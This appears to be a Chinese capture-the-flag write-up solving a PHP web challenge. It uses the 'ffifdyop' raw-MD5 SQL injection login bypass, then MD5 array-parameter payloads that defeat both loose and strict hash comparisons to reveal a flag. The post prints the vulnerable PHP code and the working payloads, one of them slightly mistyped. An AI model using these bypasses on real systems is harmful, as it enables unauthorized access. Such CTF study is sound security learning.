本文最后更新于454 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
一、信息收集
F12一下,发现没有什么有用的信息,根据提示是MD5
可以尝试使用万能密码
ffifdyop经过两次转化后得到的结果是
'or'6�]��!r,��b,可以实现绕过
二、输入万能密码
F12一下
发现提示
三、分析代码
$x= $GET['x'];
$y = $_GET['y'];
if($x != $y && md5($x) == md5($y)){
;
可以很容易发现可以使用数组绕过
构造payload:
?x[]=1&y[]2
四、分析代码二
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['wqh']!==$_POST['dsy']&&md5($_POST['wqh'])===md5($_POST['dsy'])){
echo $FLAG;
}
这里使用了强计较,依然可以使用数组绕过
五、构造payload:
wqh[]=1&dsy[]=2
成功获取flag
总结
- md5数组绕过,可以绕过强弱比较